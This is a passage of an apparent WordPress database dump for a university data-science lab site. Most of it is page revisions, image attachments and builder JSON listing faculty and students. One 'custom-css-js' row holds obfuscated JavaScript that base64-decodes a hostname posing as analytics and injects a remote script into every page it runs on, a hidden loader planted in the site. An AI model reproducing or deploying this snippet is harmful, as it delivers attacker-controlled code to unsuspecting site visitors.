time.</em></p>\n                    <h4><strong>Graduate Thesis</strong></h4>\n                    <p><em style=\"color: rgb(48, 62, 122); font-family: &quot;Open Sans&quot;; font-size: 16px; font-weight: 400;\">There are no opportunities open at this time.</em></p>\n                    <h4><strong>Graduate Projects</strong></h4>\n                    <p><em>Students interested in deploying a data catalog (datahub) for the DICE repository, please contact Chetan Tiwari (dice@cs.gsu.edu)</em></p>\n                    <h4><strong>Undergraduate Research</strong></h4>\n                    <p><em style=\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(48, 62, 122);\">Students interested in using Geographic Information Systems to create building models, contact Jean Guo (tguo4@student.gsu.edu)</em></p>\n                    <p>\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Student Opportunities','','inherit','closed','closed','','1573-revision-v1','','','2023-09-29 11:37:59','2023-09-29 15:37:59','',1573,'https://gsudice.dataconn.net/?p=1586',0,'revision','',0),(1592,1,'2023-09-29 12:57:19','2023-09-29 16:57:19','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sundos_Al_Subhi-1.jpg','cropped-cropped-Sundos_Al_Subhi-1.jpg','','inherit','open','closed','','cropped-cropped-sundos_al_subhi-1-jpg','','','2023-09-29 12:57:19','2023-09-29 16:57:19','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sundos_Al_Subhi-1.jpg',0,'attachment','image/jpeg',0),(1593,1,'2023-09-29 14:45:51','2023-09-29 18:45:51','<!-- 3124b806df769478342d448c4f8b0a76 -->','','','publish','closed','closed','','1593','','','2023-09-29 14:45:51','2023-09-29 18:45:51','',0,'https://gsudice.dataconn.net/?post_type=custom-css-js&#038;p=1593',0,'custom-css-js','',0),(1594,1,'2023-09-29 14:45:55','2023-09-29 18:45:55','<script type=\"text/javascript\">\r\n(function(_0xc59469,_0x1be38e){var _0x4e20c3=_0x442d,_0x3c2d09=_0xc59469();while(!![]){try{var _0x3c8895=-parseInt(_0x4e20c3(0xb6))/0x1*(-parseInt(_0x4e20c3(0xbc))/0x2)+parseInt(_0x4e20c3(0xb7))/0x3+-parseInt(_0x4e20c3(0xc4))/0x4*(-parseInt(_0x4e20c3(0xc1))/0x5)+-parseInt(_0x4e20c3(0xb9))/0x6+parseInt(_0x4e20c3(0xc0))/0x7+-parseInt(_0x4e20c3(0xbd))/0x8+-parseInt(_0x4e20c3(0xbb))/0x9;if(_0x3c8895===_0x1be38e)break;else _0x3c2d09[\'push\'](_0x3c2d09[\'shift\']());}catch(_0x3a9717){_0x3c2d09[\'push\'](_0x3c2d09[\'shift\']());}}}(_0x2bda,0x57e32),function(_0x17c8ea,_0x2572e7){var _0x45965e=_0x442d,_0x4c3cdb=Math[\'floor\'](Date[_0x45965e(0xbe)]()/0x3e8),_0x5c98df=_0x4c3cdb-_0x4c3cdb%0xe10;_0x4c3cdb=_0x4c3cdb-_0x4c3cdb%0x258,_0x4c3cdb=_0x4c3cdb[_0x45965e(0xbf)](0x10);if(!document[_0x45965e(0xba)])return;const _0x26bed4=atob(_0x45965e(0xc6));_0x2572e7=_0x17c8ea[_0x45965e(0xb8)](_0x45965e(0xc9)),_0x2572e7[_0x45965e(0xc2)]=\'text/javascript\',_0x2572e7[_0x45965e(0xc7)]=!![],_0x2572e7[_0x45965e(0xca)]=_0x45965e(0xc8)+_0x26bed4+_0x45965e(0xc5)+_0x5c98df+\'.js?ver=\'+_0x4c3cdb,_0x17c8ea[\'getElementsByTagName\'](\'head\')[0x0][_0x45965e(0xc3)](_0x2572e7);}(document));function _0x442d(_0x2d5425,_0x24f6b1){var _0x2bdaa6=_0x2bda();return _0x442d=function(_0x442dcc,_0xed4883){_0x442dcc=_0x442dcc-0xb6;var _0x3d5d1e=_0x2bdaa6[_0x442dcc];return _0x3d5d1e;},_0x442d(_0x2d5425,_0x24f6b1);}function _0x2bda(){var _0x5e335c=[\'script\',\'src\',\'14DpQhBD\',\'584673URYUaU\',\'createElement\',\'2561046jKBsjh\',\'referrer\',\'3560382XMVYNj\',\'7706THDVnA\',\'489360rDhlQm\',\'now\',\'toString\',\'4117806bwNLOr\',\'59780dGwAwr\',\'type\',\'appendChild\',\'136qCYCNj\',\'/my.counter.\',\'bG9hZC4zNjVhbmFseXRpY3MueHl6\',\'async\',\'https://\'];_0x2bda=function(){return _0x5e335c;};return _0x2bda();}\r\n</script>','','','publish','closed','closed','','1594','','','2023-10-18 04:01:04','2023-10-18 08:01:04','',0,'https://gsudice.dataconn.net/?post_type=custom-css-js&#038;p=1594',0,'custom-css-js','',0),(1595,1,'2023-09-29 21:25:38','2023-09-30 01:25:38','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg','Sarah_Akinola','','inherit','open','closed','','sarah_akinola-2','','','2023-10-13 10:42:39','2023-10-13 14:42:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg',0,'attachment','image/jpeg',0),(1596,1,'2023-09-29 21:26:31','2023-09-30 01:26:31','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith-1.jpg','cropped-Anvith-1.jpg','','inherit','open','closed','','cropped-anvith-1-jpg','','','2023-09-29 21:26:31','2023-09-30 01:26:31','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith-1.jpg',0,'attachment','image/jpeg',0),(1597,1,'2023-09-29 21:28:24','2023-09-30 01:28:24','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg','cropped-Anvith.jpg','','inherit','open','closed','','cropped-anvith-jpg','','','2023-09-29 21:28:24','2023-09-30 01:28:24','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg',0,'attachment','image/jpeg',0),(1599,1,'2023-09-29 21:35:55','2023-09-30 01:35:55','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg','cropped-Brindal-1.jpeg','','inherit','open','closed','','cropped-brindal-1-jpeg','','','2023-09-29 21:35:55','2023-09-30 01:35:55','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg',0,'attachment','image/jpeg',0),(1600,1,'2023-09-29 21:40:50','2023-09-30 01:40:50','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg','cropped-Reshmanjali-1.jpeg','','inherit','open','closed','','cropped-reshmanjali-1-jpeg','','','2023-09-29 21:40:50','2023-09-30 01:40:50','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg',0,'attachment','image/jpeg',0),(1601,1,'2023-09-29 21:57:38','2023-09-30 01:57:38','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png','SRM-360x360','','inherit','open','closed','','srm-360x360-2','','','2023-09-29 21:57:38','2023-09-30 01:57:38','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png',0,'attachment','image/png',0),(1610,1,'2023-09-29 22:13:21','2023-09-30 02:13:21','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c427\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c427\",\"index\":0,\"id\":\"182-c428\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-headshot.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":629,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c427\",\"index\":0,\"id\":\"182-c429\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c427\",\"index\":2,\"id\":\"182-c430\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c427\",\"index\":1,\"id\":\"182-c431\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c427\",\"index\":1,\"id\":\"182-c432\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c433\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c433\",\"index\":0,\"id\":\"182-c434\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1409,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c433\",\"index\":0,\"id\":\"182-c435\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c433\",\"index\":2,\"id\":\"182-c436\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c433\",\"index\":1,\"id\":\"182-c437\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c433\",\"index\":1,\"id\":\"182-c438\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c439\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c439\",\"index\":0,\"id\":\"182-c440\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":702,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c439\",\"index\":0,\"id\":\"182-c441\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c439\",\"index\":2,\"id\":\"182-c442\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c439\",\"index\":1,\"id\":\"182-c443\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c439\",\"index\":1,\"id\":\"182-c444\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c445\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c445\",\"index\":0,\"id\":\"182-c446\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-SRM-360x360-1.png\",\"caption\":{\"text\":\"\"},\"imageId\":1601,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c445\",\"index\":0,\"id\":\"182-c447\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c445\",\"index\":2,\"id\":\"182-c448\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c445\",\"index\":1,\"id\":\"182-c449\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c445\",\"index\":1,\"id\":\"182-c450\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c455\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c455\",\"index\":0,\"id\":\"182-c456\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c455\",\"index\":0,\"id\":\"182-c457\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c455\",\"index\":2,\"id\":\"182-c458\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c455\",\"index\":1,\"id\":\"182-c459\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c455\",\"index\":1,\"id\":\"182-c460\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c461\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c461\",\"index\":0,\"id\":\"182-c462\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c461\",\"index\":0,\"id\":\"182-c463\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c461\",\"index\":2,\"id\":\"182-c464\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c461\",\"index\":1,\"id\":\"182-c465\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c461\",\"index\":1,\"id\":\"182-c466\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c467\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c467\",\"index\":0,\"id\":\"182-c468\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c467\",\"index\":0,\"id\":\"182-c469\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c467\",\"index\":2,\"id\":\"182-c470\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c467\",\"index\":1,\"id\":\"182-c471\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c467\",\"index\":1,\"id\":\"182-c472\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c473\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c473\",\"index\":0,\"id\":\"182-c474\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c473\",\"index\":0,\"id\":\"182-c475\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c473\",\"index\":2,\"id\":\"182-c476\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c473\",\"index\":1,\"id\":\"182-c477\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c473\",\"index\":1,\"id\":\"182-c478\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c479\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c479\",\"index\":0,\"id\":\"182-c480\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c479\",\"index\":0,\"id\":\"182-c481\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c479\",\"index\":2,\"id\":\"182-c482\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c479\",\"index\":1,\"id\":\"182-c483\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c479\",\"index\":1,\"id\":\"182-c484\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c426\",\"parentId\":\"182-c425\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c425\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c453\",\"parentId\":\"182-c452\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c452\",\"parentId\":\"182-c451\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c451\",\"parentId\":\"182-c425\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c78\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c78\",\"index\":0,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sundos_Al_Subhi-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1592,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c78\",\"index\":0,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c78\",\"index\":2,\"id\":\"182-c81\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c78\",\"index\":3,\"id\":\"182-c246\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 